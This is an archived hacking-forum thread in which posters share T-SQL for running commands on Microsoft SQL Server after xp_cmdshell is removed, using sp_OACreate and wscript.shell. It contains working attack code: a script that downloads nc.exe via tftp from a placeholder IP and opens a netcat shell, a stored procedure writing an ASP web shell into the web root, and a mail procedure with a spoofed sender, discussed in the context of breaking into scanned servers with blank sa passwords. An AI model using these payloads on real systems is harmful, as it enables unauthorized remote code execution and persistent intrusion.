hi,
i lately figured out a method to execute commands on "secured" (xp_cmdshell deleted) mssql server ...
simple trick is to bypass xp_cmdsell:
Full Version: [hint] Bypass Secure Mssql
| CODE |
declare @s int exec sp_oacreate "wscripts.shell", @s out exec sp_oamethod @s, "run",NULL, "cmd.exe /c echo whatever>temp.txt" |
just wanted evrybody t0 Kn0w =9
and again still searching ... =)
cool ill test it!
umm can you explain a little more about it?
umm can you explain a little more about it?
yeah....please explane this a litle bit!
but if i got this right...then u use these commands on ur stro and the next person trying tohack this is gonna get sql error??am i right?
thx
but if i got this right...then u use these commands on ur stro and the next person trying tohack this is gonna get sql error??am i right?
thx
no sorry =)
this is a method of tricking so called "secured" mssql servers and getting cmd.exe even if xp_cmdshell is disabled or deleted..
this is a method of tricking so called "secured" mssql servers and getting cmd.exe even if xp_cmdshell is disabled or deleted..
let me see, if i have a sql scan whit account sa and pass blank for sample, and i try make a dir c:\ and him tell me SQL ERROR, is because xp_cmdshell was deleted or disabled and write the commands that you posted here, i can execute echo for example....or not??
i try learn english but i not enough good...xDD
i try learn english but i not enough good...xDD
nice dude thx
Thx for this ,i will test it 
it wont work, once cmd shel is deleted, no sql queries, i know sql been roting for over 2 years.
the cmd is sp_dropextendedproc xp_cmdshell to secure
the cmd is sp_dropextendedproc xp_cmdshell to secure
big thx, very interesting, let's google to learn more about "sp_oamethod" .... 
greets
labbertasche
greets
labbertasche
woeii thanx for this info man!
| QUOTE (mofo @ Feb 4 2004, 05:00 AM) |
| it wont work, once cmd shel is deleted, no sql queries, i know sql been roting for over 2 years. the cmd is sp_dropextendedproc xp_cmdshell to secure |
??
what wont work ??
FOR SURE it works =)
have done it thousand of times ...
and how du u manage to delete cmd !??
mate this is good info,
but I am getting this message from the server
but I am getting this message from the server
| CODE |
The command(s) completed successfully. |
now I wanna check what I have echo'ed...
I wanna "read" what I just echo'ed
How do I do that.. is it possible?
first :
cmd.exe /c echo whatever>temp.txt
second :
cmd.exe /c type temp.txt
what else =) ?
cmd.exe /c echo whatever>temp.txt
second :
cmd.exe /c type temp.txt
what else =) ?
i did not try it, but i think you can user all dos commands...
for viewing just put the command "type *your-file*" in stead of the echo command...
for viewing just put the command "type *your-file*" in stead of the echo command...
What if its admin/123 as user/pass?.. didnt get it workin for me
its the same what tools do you use to connect....?
i' have testet it with "SQL Execute helper tool 2.0"
what kind of tool did u use ?
what kind of tool did u use ?
osql.exe / isql.exe 
Can somebody post or pm me a tool which can do this.
I didn't understand how to get this working with osql.exe .
Cheers,
I didn't understand how to get this working with osql.exe .
Cheers,
oh yeah that's a very niCe information
now i'll test it 4 me
i am using sqlexec it's a nice tool but works with xp_cmdshell i think thats the problem
gr€€tZ fl4Shb4Ck
now i'll test it 4 me
i am using sqlexec it's a nice tool but works with xp_cmdshell i think thats the problem
gr€€tZ fl4Shb4Ck
it will bypass the SQL ERROR or what...?
yeah exactly .... =)
just use osql ... it's really simple =)
in near future i'll release an new improved sqlexec version wich supports :
- Mail Support =)
- File writing support
- custom cmdshell
if you have any cool ideas plz post =)
who ever might need, here are some more usefull sql functions you can use with osql or new sqlexec version ....
just use osql ... it's really simple =)
in near future i'll release an new improved sqlexec version wich supports :
- Mail Support =)
- File writing support
- custom cmdshell
if you have any cool ideas plz post =)
who ever might need, here are some more usefull sql functions you can use with osql or new sqlexec version ....
| CODE |
// if you want your MSSQL Server send mails =) CREATE PROCEDURE h4x0r$mail( @adr varchar(255), @msg varchar(2000), @sub varchar(255), @from varchar(255) = 'bill.gates@microsoft.com') AS DECLARE @CDO int, @OLEResult int, @Out int --Create CDONTS.NewMail object EXECUTE @OLEResult = sp_OACreate 'CDONTS.NewMail', @CDO OUT IF @OLEResult <> 0 PRINT 'CDONTS.NewMail' --Call Send method of the object execute @OLEResult = sp_OAMethod @CDO, 'Send', Null, @from, @adr, @sub, @msg, 0 IF @OLEResult <> 0 PRINT 'Send' --Destroy CDO EXECUTE @OLEResult = sp_OADestroy @CDO return @OLEResult // if you ever want to write to a file ... nearly useless =) CREATE PROCEDURE h4x0r$writeToFile(@FileName varchar(255), @Text1 varchar(255)) AS DECLARE @FS int, @OLEResult int, @FileID int EXECUTE @OLEResult = sp_OACreate 'Scripting.FileSystemObject', @FS OUT IF @OLEResult <> 0 PRINT 'Scripting.FileSystemObject' --Open a file execute @OLEResult = sp_OAMethod @FS, 'OpenTextFile', @FileID OUT, @FileName, 8, 1 IF @OLEResult <> 0 PRINT 'OpenTextFile' --Write Text1 execute @OLEResult = sp_OAMethod @FileID, 'WriteLine', Null, @Text1 IF @OLEResult <> 0 PRINT 'WriteLine' EXECUTE @OLEResult = sp_OADestroy @FileID EXECUTE @OLEResult = sp_OADestroy @FS |
Just extend this functions the way u like ...
hope this helped again =)
have phun ...
time to smoke a spliff =)
thankz jockel....
but i dont have sql installed, any site to download it?
pd: give me a smoke
but i dont have sql installed, any site to download it?
pd: give me a smoke
were to get osql i use sqlexec too. qould be gr8 if someone posts a dl link or uploads the file!
| QUOTE |
| were to get osql i use sqlexec too. qould be gr8 if someone posts a dl link or uploads the file! |
look at google, there are a lot of links with osql.exe and good descriptions
...like this osql.exe
greets
labbertasche
** in german : "zu faul zum suchen"
da stimm ich zu ... =)
zum teil is hier echt faules gesindel unterwegs =)
(nich böse sein is nur spass)
and net_runner :
next time i'll somke one for you =)
zum teil is hier echt faules gesindel unterwegs =)
(nich böse sein is nur spass)
and net_runner :
next time i'll somke one for you =)
Be so kind as to explain how to make it work with osql?
i didn't use it for a long time ..
most time i use my personal sqlexec ..
but as far as i remember you just create a .sql file anywhere
DO.SQL :
most time i use my personal sqlexec ..
but as far as i remember you just create a .sql file anywhere
DO.SQL :
| CODE |
declare @s int exec sp_oacreate "wscripts.shell", @s out exec sp_oamethod @s, "run",NULL, "cmd.exe /c tftp -i Y.O.U.R.I.P get nc.exe" exec sp_oamethod @s, "run",NULL, "cmd.exe /c nc.exe -l -p 666 -e cmd" |
Then you execute this file with osql like:
osql -S Servername -U Username -P Password -ic:DO.sql
yo you understand the principle ?
Oh i see, yea before i was using a -Q switch, thanks for the info m8y!
thx i will test it
Thanks alot jockel, for clearing that up, ignore my pm
here :
http://www.sqlteam.com/item.asp?ItemID=6002
is another fine article on transfering files by MSSQL ...
i'll include this in new sqlexec version ...
have fun =)
again time to roll upa spliff ...
http://www.sqlteam.com/item.asp?ItemID=6002
is another fine article on transfering files by MSSQL ...
i'll include this in new sqlexec version ...
have fun =)
again time to roll upa spliff ...
| QUOTE (jockel @ Feb 5 2004, 04:39 PM) | ||
| i didn't use it for a long time .. most time i use my personal sqlexec .. but as far as i remember you just create a .sql file anywhere DO.SQL :
Then you execute this file with osql like: osql -S Servername -U Username -P Password -ic:DO.sql yo you understand the principle ? |
eh not working buddy.
| QUOTE (QuantumTopology @ Feb 5 2004, 06:33 PM) |
| eh not working buddy. |
if youre gonna try adn tftp, make sure that they have tftp.exe, lol, if it doesnt, try ftp.exe
but if the admin secured his xp cmd shell, ftp.exe and tftp.exe might also be gone
actually i was using ftp
and all i get is 1> 2> 3> 4> 5> 6> 7> 8> 9>
and all i get is 1> 2> 3> 4> 5> 6> 7> 8> 9>
| QUOTE |
| actually i was using ftp and all i get is 1> 2> 3> 4> 5> 6> 7> 8> 9> |
me too dont work or make i something wrong ?
greetz
BigBen
you dont get the results displayed with my script ..
it just executes them directly because of the "run" paramter ..
try being creativ ...
you can spawn your shell in thousand way's ..
do i really have to explain EVERYTHINg step by step !??
i think you can do this on your own ....
dont give up
ps.:
one way (as i said of thounds !! think of your own ! be creative ) is for example writing an asp file with cmd =)
e.g.:
it just executes them directly because of the "run" paramter ..
try being creativ ...
you can spawn your shell in thousand way's ..
do i really have to explain EVERYTHINg step by step !??
i think you can do this on your own ....
dont give up
ps.:
one way (as i said of thounds !! think of your own ! be creative ) is for example writing an asp file with cmd =)
e.g.:
| CODE |
-- scripting.filesystemobject example - create a 'run this' .asp file declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out,'c:\inetpub\wwwroot\foo1.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd") ) %>' |
and please remeber i post just examples !!!
and bevor posting stuff like "eh not working buddy. "
plz be so kind to find out HOW =)
to give you an good entry point :
http://www.xfocus.net/articles/200207/sql.pdf
so ... c ya
| QUOTE (jockel @ Feb 5 2004, 04:39 PM) |
| Then you execute this file with osql like: osql -S Servername -U Username -P Password -ic:DO.sql |
sry to go off topic, but anyone have isql.exe?, i cant seem to find it alone on the forum or with google,
Thanks in advance
| QUOTE (jockel @ Feb 6 2004, 06:21 PM) | ||
| you dont get the results displayed with my script .. it just executes them directly because of the "run" paramter .. try being creativ ... you can spawn your shell in thousand way's .. do i really have to explain EVERYTHINg step by step !?? i think you can do this on your own .... dont give up ps.: one way (as i said of thounds !! think of your own ! be creative ) is for example writing an asp file with cmd =) e.g.:
and please remeber i post just examples !!! and bevor posting stuff like "eh not working buddy. " plz be so kind to find out HOW =) to give you an good entry point : http://www.xfocus.net/articles/200207/sql.pdf so ... c ya |
Er you are funny, you just fecking said that those commands one could use to upload to an ftp server.
If you are gonna act like you have discovered something monumental, you could at least back it up. I notice not a single person has said that it was successful
np here is isql.exe (mhhh no upload .... *grummel* ) ok ... here is a link
isql.rar
greets
labbertasche
isql.rar
greets
labbertasche
| QUOTE (labbertasche @ Feb 7 2004, 12:18 AM) |
| np here is isql.exe (mhhh no upload .... *grummel* ) ok ... here is a link isql.rar greets labbertasche |
thx man, aprreciate it,
| CODE |
Er you are funny, you just fecking said that those commands one could use to upload to an ftp server." |
!???
WHAT !???
UPLOAD an FTP SERVER !??
hehehe =)
did i miss something !??
it was an example to show you how to execute code !
nothing more !
it definitly works ....
believe it or not =)
Don't let them annoy you jockel, your method works fine.
It doesn't work on all servers however:
It doesn't work on all servers however:
| CODE |
[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'sp_OACreate', database 'master', owner 'dbo'. |
| QUOTE (labbertasche @ Feb 7 2004, 07:18 AM) |
| np here is isql.exe (mhhh no upload .... *grummel* ) ok ... here is a link isql.rar greets labbertasche |
hm, i need the ntwdblib.dll
can u upload it plz
Here it is
MfG
BigBen
MfG
BigBen
many thanxxxs bigben
About securing MSSQL box, I've learn rediang your post that you do it deleting the "procedure" or "method" ( I dont know MSSQL ) that is used to run cmd.
I've read in some tutorial people who secure the box by changing the sa password... this is wrong? Cause after this change sysop may notice it?
Sorry for stupid question if it is. I'm new here and in the scene ( just 1 hacxxx lol ).
Thank you
) that is used to run cmd.I've read in some tutorial people who secure the box by changing the sa password... this is wrong? Cause after this change sysop may notice it?
Sorry for stupid question if it is. I'm new here and in the scene ( just 1 hacxxx lol ).
Thank you
This isnt the "hacxxx" scene. This is the security scene... go to FXPBoards for "hacxxx" scene...
| QUOTE (Thom @ Feb 9 2004, 02:33 PM) |
| This isnt the "hacxxx" scene. This is the security scene... go to FXPBoards for "hacxxx" scene... |
sorry... you are right...
I would not mean this... I only ask what the situation about changing the sa password by the attacker.
i think normally a h4x0r wouldn't do that
thats too obvious ..
a good method of securing is to deny "execute" rights for sa ..
that throws errors like :
[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on
object 'xp_cmdshell', database 'master', owner 'dbo'.
thats too obvious ..
a good method of securing is to deny "execute" rights for sa ..
that throws errors like :
[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on
object 'xp_cmdshell', database 'master', owner 'dbo'.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
